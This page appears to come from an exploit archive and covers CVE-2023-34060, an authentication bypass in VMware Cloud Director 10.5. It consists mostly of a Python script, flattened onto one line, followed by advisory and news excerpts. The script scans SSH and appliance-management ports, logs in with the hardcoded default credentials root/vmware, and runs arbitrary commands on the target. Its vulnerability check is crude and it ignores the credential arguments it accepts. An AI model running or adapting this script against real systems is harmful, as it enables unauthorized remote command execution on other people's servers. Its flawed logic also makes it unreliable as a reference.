Headline
VMware Cloud Director 10.5 Authentication Bypass
VMware Cloud Director version 10.5 suffers from an authentication bypass vulnerability.
# Exploit Title: [VMware Cloud Director | Bypass identity verification]# Google Dork: [non]# Date: [12/06/2023]# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)# Version: [10.5]# CVE : [CVE-2023-34060]import requestsimport paramikoimport subprocessimport socketimport argparseimport threading# Define a function to check if a port is opendef is_port_open(ip, port): # Create a socket object s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Set the timeout to 1 second s.settimeout(1) # Try to connect to the port try: s.connect((ip, port)) # The port is open return True except: # The port is closed return False finally: # Close the socket s.close()# Define a function to exploit a vulnerable devicedef exploit_device(ip, port, username, password, command): # Create a ssh client object client = paramiko.SSHClient() # Set the policy to accept any host key client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # Connect to the target using the credentials client.connect(ip, port, "root", "vmware", allow_agent=False, look_for_keys=False) # Execute the command and get the output stdin, stdout, stderr = client.exec_command(command) # Print the output print(f"The output of the command {command} on the device {ip}:{port} is: {stdout.read().decode()}") # Close the ssh connection client.close()# Parse the arguments from the userparser = argparse.ArgumentParser(description="A Python program to detect and exploit the CVE-2023-34060 vulnerability in VMware Cloud Director")parser.add_argument("ip", help="The target IP address")parser.add_argument("-p", "--ports", nargs="+", type=int, default=[22, 5480], help="The target ports to check")parser.add_argument("-u", "--username", default="root", help="The username for ssh")parser.add_argument("-w", "--password", default="vmware", help="The password for ssh")parser.add_argument("-c", "--command", default="hostname", help="The command to execute on the vulnerable devices")args = parser.parse_args()# Loop through the ports and check for the vulnerabilityfor port in args.ports: # Check if the port is open if is_port_open(args.ip, port): # The port is open, send a GET request to the port and check the status code response = requests.get(f"http://{args.ip}:{port}") if response.status_code == 200: # The port is open and vulnerable print(f"Port {port} is vulnerable to CVE-2023-34060") # Create a thread to exploit the device thread = threading.Thread(target=exploit_device, args=(args.ip, port, args.username, args.password, args.command)) # Start the thread thread.start() else: # The port is open but not vulnerable print(f"Port {port} is not vulnerable to CVE-2023-34060") else: # The port is closed print(f"Port {port} is closed")Related news
VMware is warning of a critical and unpatched security flaw in Cloud Director that could be exploited by a malicious actor to get around authentication protections. Tracked as CVE-2023-34060 (CVSS score: 9.8), the vulnerability impacts instances that have been upgraded to version 10.5 from an older version. "On an upgraded version of VMware Cloud Director Appliance 10.5, a malicious actor with
VMware Cloud Director Appliance contains an authentication bypass vulnerability in case VMware Cloud Director Appliance was upgraded to 10.5 from an older version. On an upgraded version of VMware Cloud Director Appliance 10.5, a malicious actor with network access to the appliance can bypass login restrictions when authenticating on port 22 (ssh) or port 5480 (appliance management console) . This bypass is not present on port 443 (VCD provider and tenant login). On a new installation of VMware Cloud Director Appliance 10.5, the bypass is not present.